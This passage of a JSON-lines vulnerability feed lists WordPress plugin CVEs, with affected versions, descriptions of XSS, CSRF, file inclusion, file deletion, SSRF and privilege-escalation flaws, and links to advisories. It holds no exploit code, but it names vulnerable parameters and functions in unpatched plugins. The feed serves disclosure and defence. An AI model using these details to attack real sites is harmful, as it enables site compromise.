"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13097","slug":"wp-finance","versionImpact":"1.3.6","description":"The WP Finance WordPress plugin through 1.3.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d83d7274-55ae-4f35-b65e-6d6e19e36fac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d83d7274-55ae-4f35-b65e-6d6e19e36fac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13591","slug":"team-builder-for-wpbakery-page-builder","versionImpact":"1.0","description":"The Team Builder For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'team-builder-vc' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/includes\\\/style10.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/includes\\\/style10.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6b1e4d9-03dc-47e8-ab41-ae9c04dc0132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6b1e4d9-03dc-47e8-ab41-ae9c04dc0132?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3529","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.2","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.2 via the 'file_url' parameter. This makes it possible for unauthenticated attackers to view potentially sensitive information and download a digital product without paying for it.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordpress-simple-paypal-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordpress-simple-paypal-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-simple-cart-sell-digital-downloads-2468\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-simple-cart-sell-digital-downloads-2468\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fecc015-518f-4aab-a17e-17cf4b8cf123?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fecc015-518f-4aab-a17e-17cf4b8cf123?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6797","slug":"dl-robotstxt","versionImpact":"1.2","description":"The DL Robots.txt WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14275493-45fd-470c-958f-feded435f706\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14275493-45fd-470c-958f-feded435f706\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2932","slug":"jkdevkit","versionImpact":"1.9.4","description":"The JKDEVKIT plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'font_upload_handler' function in all versions up to, and including, 1.9.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). If WooCommerce is enabled, attackers will need Contributor-level access and above.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"http:\\\/\\\/example.com\\\/wp-content\\\/plugins\\\/jkdevkit\\\/inc\\\/modules\\\/fonts_manager.php#L1710\",\"name\":\"http:\\\/\\\/example.com\\\/wp-content\\\/plugins\\\/jkdevkit\\\/inc\\\/modules\\\/fonts_manager.php#L1710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2301","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.9.1","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.9.1. This is due to missing nonce validation on the ls_parse_vcita_callback function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61c39f5f-3b17-4e4d-824e-241159a73400?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61c39f5f-3b17-4e4d-824e-241159a73400?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4277","slug":"realia","versionImpact":"1.4.0","description":"The Realia plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.0. This is due to missing nonce validation on the 'process_change_profile_form' function. This makes it possible for unauthenticated attackers to change user email via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realia\\\/tags\\\/1.4.0\\\/includes\\\/post-types\\\/class-realia-post-type-user.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realia\\\/tags\\\/1.4.0\\\/includes\\\/post-types\\\/class-realia-post-type-user.php#L112\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06f33e18-0bdd-4c56-a8df-fc1969b9ecf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06f33e18-0bdd-4c56-a8df-fc1969b9ecf8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0590","slug":"microsoft-clarity","versionImpact":"0.9.3","description":"The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5205","slug":"videojs-html5-player","versionImpact":"1.1.11","description":"The Videojs HTML5 Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videojs_video shortcode in all versions up to, and including, 1.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd76a2-6700-4c2a-858d-4c7339a8d09a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd76a2-6700-4c2a-858d-4c7339a8d09a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/videojs-html5-player\\\/trunk\\\/videojs-html5-player.php#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/videojs-html5-player\\\/trunk\\\/videojs-html5-player.php#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091226\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091226\\\/#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/videojs-html5-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/videojs-html5-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6459","slug":"news-element","versionImpact":"1.0.5","description":"The News Element Elementor Blog Magazine WordPress plugin before 1.0.6 is vulnerable to Local File Inclusion via the template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/330359fa-d085-4923-b5a8-c0e2e5267247\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/330359fa-d085-4923-b5a8-c0e2e5267247\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9235","slug":"mapster-wp-maps","versionImpact":"1.5.0","description":"The Mapster WP Maps plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to an insufficient capability check on the mapster_wp_maps_set_option_from_js() function in all versions up to, and including, 1.5.0. This makes it possible for authenticated attackers, with contributor-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b81c2990-68d1-4d45-9724-262ec017caf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b81c2990-68d1-4d45-9724-262ec017caf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-mapster-wp-maps\\\/blob\\\/009ff350f7fee0788c6d8a735af03e21b132c983\\\/mapster-wp-maps\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php#L12\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-mapster-wp-maps\\\/blob\\\/009ff350f7fee0788c6d8a735af03e21b132c983\\\/mapster-wp-maps\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161051\\\/mapster-wp-maps\\\/tags\\\/1.5.0\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php?old=3154048&old_path=mapster-wp-maps%2Ftags%2F1.4.1%2Fadmin%2Fapi%2Fclass-mapster-wordpress-maps-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161051\\\/mapster-wp-maps\\\/tags\\\/1.5.0\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php?old=3154048&old_path=mapster-wp-maps%2Ftags%2F1.4.1%2Fadmin%2Fapi%2Fclass-mapster-wordpress-maps-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173973\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173973\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10147","slug":"steel","versionImpact":"1.3.0","description":"The Steel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ed1ef4-8867-499b-8f73-296280573462?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ed1ef4-8867-499b-8f73-296280573462?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/steel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/steel\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11853","slug":"jalbum-bridge","versionImpact":"2.0.15","description":"The jAlbum Bridge plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ar\u2019 parameter in all versions up to, and including, 2.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jalbum-bridge\\\/tags\\\/2.0.15\\\/jalbum-bridge.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jalbum-bridge\\\/tags\\\/2.0.15\\\/jalbum-bridge.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198794\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198794\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jalbum-bridge\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jalbum-bridge\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b50c83-7128-4e38-9a5e-0954928ff002?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b50c83-7128-4e38-9a5e-0954928ff002?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11375","slug":"wc1c-main","versionImpact":"0.23.0","description":"The WC1C plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.23.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc1c-main\\\/tags\\\/0.23.0\\\/views\\\/promo\\\/activation.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc1c-main\\\/tags\\\/0.23.0\\\/views\\\/promo\\\/activation.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52293a10-4240-4a6b-a05b-33675a4ed6b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52293a10-4240-4a6b-a05b-33675a4ed6b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12696","slug":"picture-gallery","versionImpact":"1.5.22","description":"The Picture Gallery \u2013 Frontend Image Uploads, AJAX Photo List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videowhisper_picture_upload_guest shortcode in all versions up to, and including, 1.5.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224277\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224277\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/picture-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/picture-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a116c846-72df-4701-893a-744a26b191d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a116c846-72df-4701-893a-744a26b191d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13096","slug":"wp-finance","versionImpact":"1.3.6","description":"The WP Finance WordPress plugin through 1.3.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca65c478-30bf-4109-93e0-3aedbf4a8264\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca65c478-30bf-4109-93e0-3aedbf4a8264\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13589","slug":"jma-youtube-playlists-with-schema","versionImpact":"2.6.1","description":"The YouTube Playlists with Schema plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yt_grid' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jma-youtube-playlists-with-schema\\\/trunk\\\/youtube-playlists-with-schema.php#L557\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jma-youtube-playlists-with-schema\\\/trunk\\\/youtube-playlists-with-schema.php#L557\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29ef6956-aeb7-4a72-9f51-b5c5b05c1425?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29ef6956-aeb7-4a72-9f51-b5c5b05c1425?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13857","slug":"wpgetapi","versionImpact":"2.2.10","description":"The WPGet API \u2013 Connect to any external REST API plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251647\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251647\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgetapi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgetapi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2a8e7b-6fca-49f3-ba6d-bdaa418f611a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2a8e7b-6fca-49f3-ba6d-bdaa418f611a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3749","slug":"wt-display-breeze","versionImpact":"1.2.3","description":"The Breeze Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018cal_size\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wt-display-breeze\\\/trunk\\\/includes\\\/shortcodes.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wt-display-breeze\\\/trunk\\\/includes\\\/shortcodes.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280146\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280146\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wt-display-breeze\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wt-display-breeze\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527dd2c7-5bbb-4c79-aa3c-7d70ddd26163?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527dd2c7-5bbb-4c79-aa3c-7d70ddd26163?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4551","slug":"rich-table-of-content","versionImpact":"1.3.7","description":"The Rich Table of Contents WordPress plugin through 1.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c00b17-00ba-4c3f-8587-d54449a02659\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c00b17-00ba-4c3f-8587-d54449a02659\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1912","slug":"limit-login-attempts","versionImpact":"1.7.1","description":"The Limit Login Attempts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its lock logging feature in versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the plugin's settings page. This only works when the plugin prioritizes use of the X-FORWARDED-FOR header, which can be configured in its settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=551920%40limit-login-attempts%2Ftags%2F1.7.1&new=2893850%40limit-login-attempts%2Ftags%2F1.7.2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=551920%40limit-login-attempts%2Ftags%2F1.7.1&new=2893850%40limit-login-attempts%2Ftags%2F1.7.2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8c80fc-3b51-4003-b221-6f02e74bead0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8c80fc-3b51-4003-b221-6f02e74bead0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2300","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.9.1","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ce97ba-8053-481f-bcd7-05d5e8292adb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ce97ba-8053-481f-bcd7-05d5e8292adb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
